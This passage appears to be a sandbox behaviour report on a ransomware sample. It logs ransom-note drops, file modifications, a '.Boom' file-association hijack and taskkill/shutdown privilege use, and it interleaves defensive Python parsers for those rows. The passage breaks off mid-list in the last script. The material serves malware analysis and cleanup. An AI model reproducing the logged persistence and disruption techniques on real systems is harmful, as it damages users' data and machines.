File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\title_stripe.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationUp_ButtonGraphic.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winsxs\amd64_microsoft-windows-m..-mdac-rds-shape-dll_31bf3856ad364e35_6.1.7600.16385_none_2c0460a5d6cf99aa\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\winsxs\x86_microsoft-windows-mail-app_31bf3856ad364e35_6.1.7601.17514_none_f35f9773adf74c06\Bears.jpg C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-p..rtmonitor.resources_31bf3856ad364e35_6.1.7600.16385_it-it_e1bbd91348b28fbd\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-e..ntication.resources_31bf3856ad364e35_6.1.7600.16385_es-es_af29a5cb947bb312\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..l-starter.resources_31bf3856ad364e35_6.1.7600.16385_es-es_7ff30646d8c5721f\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-wlangpui.resources_31bf3856ad364e35_6.1.7600.16385_en-us_75b8a5c3d25e2a01\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_netl1c64.inf.resources_31bf3856ad364e35_6.1.7600.16385_es-es_c0290a272487a6be\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-ie-htmlapplication_31bf3856ad364e35_11.2.9600.16428_none_3bb1024f1e6bc086\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-t..onmanager.resources_31bf3856ad364e35_6.1.7600.16385_de-de_8f95e98467a98e5e\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_net8187se64.inf.resources_31bf3856ad364e35_6.1.7600.16385_es-es_26a869f069f08dc4\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_wsdprint.inf.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_b7256a767543d30d\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\winsxs\x86_microsoft-windows-e..rtingcore.resources_31bf3856ad364e35_6.1.7600.16385_es-es_02b53e1d98470ee8\erofflps.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-s..g-jscript.resources_31bf3856ad364e35_8.0.7600.16385_fr-fr_1109fb9951b8f80b\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-wpfcorecomp.resources_31bf3856ad364e35_6.1.7601.17514_ja-jp_e2ebaa32abd84c8f\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-dpapi-keys.resources_31bf3856ad364e35_6.1.7600.16385_de-de_9bf0da4150b60702\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-r..tance-adm.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_a3356af4d9adcae1\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-b..trics-cpl.resources_31bf3856ad364e35_6.1.7600.16385_es-es_9c8da1aa88db9946\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-j..buggeride.resources_31bf3856ad364e35_8.0.7600.16385_es-es_8a689fd92c8b700f\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-m..s-service.resources_31bf3856ad364e35_6.1.7600.16385_it-it_ff2f11062d6c5d92\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\assembly\GAC_MSIL\system.workflow.componentmodel.resources\3.0.0.0_ja_31bf3856ad364e35\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.GroupPoli#\06d363f8e85281d0f70f2c88d1a0e667\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-ipnat.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_6f0da6cf6309ed22\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\wow64_microsoft-windows-s..ativehost.resources_31bf3856ad364e35_6.1.7600.16385_it-it_24d0deee1ac49b0e\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\assembly\GAC_MSIL\MICROSOFT.VISUALBASIC.COMPATIBILITY.DATA.resources\8.0.0.0_ja_b03f5f7f11d50a3a\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-i..ngsupport.resources_31bf3856ad364e35_8.0.7600.16385_en-us_ad729b320c691eac\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-s..-soundthemes-sonata_31bf3856ad364e35_6.1.7600.16385_none_201752c112c5078c\Windows Balloon.wav C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\winsxs\x86_microsoft-windows-g..ets-slideshowgadget_31bf3856ad364e35_6.1.7600.16385_none_253e8c58002c48e1\blank.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-g..licy-base.resources_31bf3856ad364e35_6.1.7600.16385_de-de_181a1bc5e35bb95e\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_netfx-shfusion_res_dll_b03f5f7f11d50a3a_6.1.7600.16385_none_7a97f0ca887d1f24\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\Media\Calligraphy\Windows Hardware Remove.wav C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\msil_msbuild.resources_b03f5f7f11d50a3a_6.1.7600.16385_ja-jp_0f2251f715f14f5f\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_netfx-csc_exe_config_b03f5f7f11d50a3a_6.1.7600.16385_none_5bfb623d555cccb6\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\assembly\GAC_MSIL\Narrator\6.1.0.0__31bf3856ad364e35\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-s..cingstack.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_8b317f4ba16d3507\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_es-es_27c74b34efa6572d\about_If.help.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-help-gamesp.resources_31bf3856ad364e35_6.1.7600.16385_en-us_0a4908dad3d0a5db\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-m..-mdac-rds-shape-rll_31bf3856ad364e35_6.1.7600.16385_none_3239c529d2d1d90c\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-speechcommonnoia64_31bf3856ad364e35_6.1.7600.16385_none_5e9e78a6dd413413\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-w..ystemassessmenttool_31bf3856ad364e35_6.1.7601.17514_none_d9bafd47cdf9833b\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-e..gine-isam.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_0e32b701c9788fec\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_taskschedulersettings.resources_31bf3856ad364e35_6.1.7600.16385_en-us_f34361298f0b5882\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\Boot\Fonts\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..iadisc-style-travel_31bf3856ad364e35_6.1.7600.16385_none_f2a7c66510a5395d\passport.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_en-us_1da743febb1ea38d\about_scripts.help.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\msil_comsvcconfig.resources_b03f5f7f11d50a3a_6.1.7601.17514_ja-jp_2a37215727b5d00e\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-ie-setup_31bf3856ad364e35_11.2.9600.16428_none_1f77d330a4790dae\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-m..oledb-rll.resources_31bf3856ad364e35_6.1.7600.16385_en-us_774f231c5b0ae344\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Entity.Design\v4.0_4.0.0.0__b77a5c561934e089\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-i..-platform.resources_31bf3856ad364e35_8.0.7600.16385_de-de_9953c1c53c7a8c94\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-u..re-atmini.resources_31bf3856ad364e35_6.1.7600.16385_en-us_4dbe3af629c49981\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-opengl.resources_31bf3856ad364e35_6.1.7600.16385_es-es_9ee9341436547754\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-deltapackageexpander_31bf3856ad364e35_6.1.7601.17514_none_c8049b9e4ba7658c\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-iis-bpa.resources_31bf3856ad364e35_6.1.7601.17514_ja-jp_251746b074c94113\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_server-help-chm.reliab.resources_31bf3856ad364e35_6.1.7600.16385_de-de_75c5fd0bb9b184d9\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_setup-uxwizard-clientimages_31bf3856ad364e35_6.1.7600.16385_none_48ada01d8ff36e68\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-n..35wpfcomp.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_67ecd7388fa46002\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-n..meworkapi.resources_31bf3856ad364e35_6.1.7600.16385_de-de_04346e25ffbfe92d\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_tr-tr_9e98e8587a93bcd6\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-h..putername.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_0202957a15d38086\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-netplwiz.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_2dd66c79c7e4f8e2\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-isoburn.resources_31bf3856ad364e35_6.1.7600.16385_de-de_27d3aa8ba7b1db61\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-m..ac-sql-cliconfg-exe_31bf3856ad364e35_6.1.7600.16385_none_6ff39cfbb8057a05\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-whhelper.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_70e8a62da42e1401\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
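The three file tables above are long enough that the useful facts get lost: how many directories received the ransom note, which file types were rewritten, and that the sample opened executables under C:\Windows (rekeywiz.exe, esentutl.exe, dllhost.exe, ComSvcConfig.exe) for modification, which is OS damage rather than just user-data loss. The following Python script is an added example, not part of the sandbox's tooling; it parses rows in exactly the format printed above and produces that summary. SAMPLE_EVENTS is a constructed subset copied from the tables, and USER_WRITABLE is an assumed list of path markers for directories a standard user can write to. Note that "File opened for modification" records the open, not the bytes written, so the count of rewritten files is an upper bound unless the sandbox also reports the write.

```python
"""Summarise sandbox file-event rows of the kind listed in the tables above.

Added example, not part of the sandbox's own tooling. SAMPLE_EVENTS are a
constructed subset copied from the three "Drops file" tables in this report.
"""
import re
from collections import Counter
from pathlib import PureWindowsPath

RANSOM_NOTE = "HOW TO DECRYPT FILES.txt"
EVENT_RE = re.compile(r"^(File created|File opened for modification) (.+)$")
# Assumed markers for directories a standard user can write to.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\")

SAMPLE_EVENTS = [
    r"File created C:\Windows\SysWOW64\ar-SA\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A",
    r"File opened for modification C:\Windows\SysWOW64\rekeywiz.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A",
    r"File opened for modification C:\Windows\SysWOW64\esentutl.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A",
    r"File created C:\Windows\SysWOW64\Recovery\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A",
    r"File opened for modification C:\Program Files\Windows Mail\WinMail.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A",
    r"File created C:\Program Files (x86)\MSBuild\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A",
    r"File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A",
    r"File created C:\Windows\Boot\Fonts\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A",
    r"File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A",
]


def parse_event(line):
    """Split one row into (action, target path, acting process).

    Target paths contain spaces, so split from the right: the acting process
    is the last field beginning with a drive letter and the final column is N/A.
    """
    line = line.strip()
    if line.endswith(" N/A"):
        line = line[:-4]
    head, sep, proc = line.rpartition(" C:\\")
    if not sep:
        return None
    m = EVENT_RE.match(head)
    if not m:
        return None
    return m.group(1), m.group(2), "C:\\" + proc


def summarise(lines):
    """Count ransom notes, modified files by type, and system binaries touched."""
    note_dirs, actors, system_exes = set(), set(), []
    modified_by_ext, events_by_root = Counter(), Counter()
    for line in lines:
        parsed = parse_event(line)
        if parsed is None:
            continue
        action, target, proc = parsed
        actors.add(proc)
        p = PureWindowsPath(target)
        top = p.parts[1] if len(p.parts) > 1 else p.anchor
        events_by_root[top] += 1
        if action == "File created" and p.name == RANSOM_NOTE:
            note_dirs.add(str(p.parent))
        elif action == "File opened for modification":
            ext = p.suffix.lower()
            modified_by_ext[ext] += 1
            # Executables under C:\Windows being rewritten is worth separating
            # out: that is damage to the OS installation, not just to user data.
            if ext == ".exe" and top.lower() == "windows":
                system_exes.append(str(p))
    return {
        "actors": sorted(actors),
        "actor_in_user_writable": any(
            marker in a.lower() for a in actors for marker in USER_WRITABLE
        ),
        "ransom_note_dirs": sorted(note_dirs),
        "modified_by_ext": dict(modified_by_ext),
        "system_executables_modified": system_exes,
        "events_by_root": dict(events_by_root),
        # Notes dropped in several directories plus files rewritten is the
        # ransomware pattern; either signal on its own is not.
        "ransomware_pattern": len(note_dirs) >= 2 and sum(modified_by_ext.values()) >= 2,
    }


if __name__ == "__main__":
    for key, value in summarise(SAMPLE_EVENTS).items():
        print(f"{key}: {value}")
```

Run against the full tables, the per-root counts show how little of the activity targets user documents on this analysis VM; the sample walks the whole volume, which is why notes land in driver-store and WinSxS directories.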

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Boom\ = "SSTWIPNUVDUSGRM" C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SSTWIPNUVDUSGRM\ = "CRYPTED!" C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SSTWIPNUVDUSGRM\shell\open\command C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SSTWIPNUVDUSGRM\shell\open C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SSTWIPNUVDUSGRM\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Bdx48saERp3j6l1.exe" C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Boom C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SSTWIPNUVDUSGRM C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SSTWIPNUVDUSGRM\DefaultIcon C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SSTWIPNUVDUSGRM\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Bdx48saERp3j6l1.exe,0" C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SSTWIPNUVDUSGRM\shell C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
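Read together, the rows above register a new file type: the `.Boom` extension is bound to the ProgID `SSTWIPNUVDUSGRM`, whose display name is "CRYPTED!" and whose `shell\open\command` is `C:\Users\Admin\AppData\Local\Temp\Bdx48saERp3j6l1.exe`. Opening any encrypted file through Explorer therefore re-launches that binary, which is a re-execution path that survives after Tempsvchost.exe exits, and note that the handler is a different file from the process that wrote the keys, so cleanup has to cover both paths. The Python below is an added example, not the sandbox's own code: it parses rows in the format printed above, follows extension to ProgID to open command, and flags handlers (and the wallpaper from the earlier table) that live in user-writable locations. SAMPLE_ROWS are copied from this report's tables; USER_WRITABLE is an assumed list of path markers.

```python
"""Reconstruct the .Boom file-association hijack from the registry rows above.

Added example, not the sandbox's own tooling. SAMPLE_ROWS are copied from the
"Modifies registry class" and "Sets desktop wallpaper using registry" tables
of this report; USER_WRITABLE is an assumed list of user-writable locations.
"""
import re

SET_RE = re.compile(r'^Set value \(str\) (.+?) = "(.*)" (\S+) N/A$')
CLASSES = "\\registry\\machine\\software\\classes\\"
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")

SAMPLE_ROWS = [
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Boom\ = "SSTWIPNUVDUSGRM" C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SSTWIPNUVDUSGRM\ = "CRYPTED!" C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A',
    r'Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SSTWIPNUVDUSGRM\shell\open\command C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SSTWIPNUVDUSGRM\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Bdx48saERp3j6l1.exe" C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SSTWIPNUVDUSGRM\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Bdx48saERp3j6l1.exe,0" C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ncihmbejmpladfin.bmp" C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A',
]


def parse_set_values(rows):
    """Map each written registry value to its string.

    The sandbox doubles backslashes inside quoted values, so un-escape them.
    "Key created" rows carry no value and are skipped. A trailing backslash
    on the key name denotes the key's (Default) value.
    """
    values = {}
    for row in rows:
        m = SET_RE.match(row.strip())
        if not m:
            continue
        key, raw_value, _actor = m.groups()
        values[key.rstrip("\\")] = raw_value.replace("\\\\", "\\")
    return values


def executable_of(command):
    """Extract the executable from a shell\\open\\command or DefaultIcon value."""
    cmd = command.strip()
    if cmd.startswith('"'):
        return cmd[1:].split('"', 1)[0]
    return cmd.split(",", 1)[0].split(" %", 1)[0]


def is_user_writable(path):
    return any(marker in path.lower() for marker in USER_WRITABLE)


def resolve_associations(values):
    """Follow extension -> ProgID -> open command, flag handlers in user
    directories, and report a wallpaper that points at a user-writable file."""
    lower = {k.lower(): v for k, v in values.items()}
    findings = []
    for key, progid in values.items():
        if not key.lower().startswith(CLASSES + "."):
            continue
        base = CLASSES + progid.lower()
        command = lower.get(base + "\\shell\\open\\command")
        exe = executable_of(command) if command else None
        findings.append({
            "kind": "file_association",
            "extension": key[len(CLASSES):],
            "progid": progid,
            "display_name": lower.get(base),
            "open_command": command,
            "default_icon": lower.get(base + "\\defaulticon"),
            "executable": exe,
            "suspicious": exe is not None and is_user_writable(exe),
        })
    for key, value in lower.items():
        if key.endswith("\\control panel\\desktop\\wallpaper"):
            findings.append({"kind": "wallpaper", "path": value,
                             "suspicious": is_user_writable(value)})
    return findings


if __name__ == "__main__":
    for finding in resolve_associations(parse_set_values(SAMPLE_ROWS)):
        print(finding)
```

The same resolution logic applies to a live host's HKLM\SOFTWARE\Classes and HKCU\SOFTWARE\Classes: an extension whose handler command resolves to a path under AppData, Temp or ProgramData is the check worth running during cleanup, independent of the extension name this particular sample chose.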

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
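The privilege rows above only make sense next to the "Suspicious use of WriteProcessMemory" table that follows: the original sample (PID 2212, running from AppData\Local\Temp) launches Tempsvchost.exe and then repeated taskkill.exe and shutdown.exe children, and it is those children that enable SeDebugPrivilege (taskkill, to terminate processes it does not own) and SeShutdownPrivilege/SeRemoteShutdownPrivilege (shutdown). Each child appears in several "wrote to memory of" rows because the sandbox logs every write made while the process is being set up; the targets are children the sample itself started, so read those rows as process creation unless a write targets a process the sample did not launch. The Python below is an added example, not the sandbox's own tooling: it collapses the repeated rows into one record per child PID, attaches the privileges each child image enabled, and flags LOLBins launched by a parent in a user-writable directory. SAMPLE_ROWS reproduce rows from both tables (duplicates kept on purpose); LOLBINS and USER_WRITABLE are assumed lists chosen for illustration.

```python
"""Rebuild the spawn tree and privilege use from the two tables around this block.

Added example, not part of the sandbox's tooling. SAMPLE_ROWS reproduce rows
from the "Suspicious use of AdjustPrivilegeToken" and "Suspicious use of
WriteProcessMemory" tables of this report, duplicates included.
"""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

TOKEN_RE = re.compile(r"^Token: (\w+) N/A (\S+) N/A$")
WRITE_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")
# Assumed: built-in tools ransomware commonly drives; only the first two appear in this report.
LOLBINS = {"taskkill.exe", "shutdown.exe", "vssadmin.exe", "wbadmin.exe", "bcdedit.exe", "wmic.exe"}
# Assumed markers for directories a standard user can write to.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")

SAMPLE_ROWS = [
    r"Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A",
    r"Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A",
    r"Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A",
    r"Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A",
    r"Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A",
    r"PID 2212 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe",
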